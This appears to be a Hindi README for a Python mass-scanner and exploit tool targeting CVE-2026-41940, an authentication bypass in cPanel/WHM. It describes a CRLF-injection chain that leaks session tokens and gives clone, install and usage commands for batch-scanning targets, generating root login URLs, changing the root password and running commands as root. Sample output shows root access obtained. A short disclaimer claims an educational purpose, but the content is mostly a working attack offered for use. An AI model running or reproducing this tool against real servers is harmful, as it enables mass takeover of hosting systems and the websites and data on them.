
cPanel/WHM CVE-2026-41940 - सामूहिक स्कैनर और शोषक
CVE-2026-41940 के लिए cPanel/WHM प्रमाणीकरण बायपास स्कैनर और एक्सप्लॉइट टूल
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
इस टूल का उपयोग करके, आप सहमत हैं कि:
❗ लेखक इस टूल के उपयोग से होने वाले किसी भी दुरुपयोग, अवैध गतिविधियों, क्षति या कानूनी परिणामों के लिए ।
CVE-2026-41940 cPanel/WHM में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो हमलावरों को वैध क्रेडेंशियल्स के बिना अनधिकृत रूट-स्तरीय पहुँच प्राप्त करने की अनुमति दे सकती है।
यह टूल निम्नलिखित के लिए एक Python-आधारित कार्यान्वयन प्रदान करता है:
| चरण | विवरण |
|---|---|
| 1. प्री-प्रमाणीकरण | whostmgrsession कुकी प्राप्त करने के लिए /login/ पर अमान्य क्रेडेंशियल्स भेजें |
| 2. CRLF इंजेक्शन | cpsess टोकन लीक करने के लिए Authorization: Basic हेडर के माध्यम से न्यूलाइन इंजेक्ट करें |
| 3. टोकन प्रसार | टोकन को कैश में प्रसारित करने के लिए do_token_denied ट्रिगर करें |
| 4. सत्यापन | WHM रूट पहुँच की पुष्टि करने के लिए /json-api/version एक्सेस करें |
| विशेषता | विवरण |
|---|---|
| 🔄 बैच स्कैनिंग | कई लक्ष्यों को एक साथ स्कैन करें |
| 🎯 एकल लक्ष्य | विस्तृत आउटपुट के साथ व्यक्तिगत लक्ष्य स्कैन करें |
| 🔌 पोर्ट स्कैनिंग | WHM पोर्ट (2082, 2083, 2086, 2087) का स्वतः स्कैन |
| 🔓 सत्र URL | एक-क्लिक WHM लॉगिन URL उत्पन्न करें |
| 💀 RCE | रूट के रूप में सिस्टम कमांड निष्पादित करें |
| 🔑 पासवर्ड बदलें | WHM रूट पासवर्ड संशोधित करें |
| 📡 WHM API कॉल | WHM API फ़ंक्शन कॉल करें |
| 🎨 रंगीन आउटपुट | परिणामों के लिए दृश्य आउटपुट |
| 💾 परिणाम निर्यात करें | भेद्य लक्ष्यों को फ़ाइल में सहेजें |
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
| पैरामीटर | विवरण | उदाहरण |
|---|---|---|
| -u | एकल लक्ष्य URL | -u https://target.com:2087 |
| -f | लक्ष्य सूची फ़ाइल | -f targets.txt |
| -c | समवर्तीता (थ्रेड्स) | -c 20 |
| -o | आउटपुट फ़ाइल | -o results.txt |
| -hostname | कस्टम Host हेडर | -hostname cpanel.target.com |
| --scan-ports | सभी WHM पोर्ट स्कैन करें | --scan-ports |
| -session | लॉगिन URL उत्पन्न करें | -session |
| -passwd | रूट पासवर्ड बदलें | -passwd "NewPass123" |
| -cmd | कमांड निष्पादित करें | -cmd "id" |
| -keep | अस्थायी खाता रखें | -keep |
| -api | WHM API कॉल करें | -api listaccts |
| -api-params | API पैरामीटर | -api-params "user=root,password=123" |
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2026-41940 |
| गंभीरता | गंभीर (CVSS 9.8) |
| हमला वेक्टर | नेटवर्क |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
-hostname आवश्यक हैसुरक्षित और कानूनी परीक्षण के लिए:
यदि इस प्रोजेक्ट ने आपकी मदद की, तो इसे ⭐ देने पर विचार करें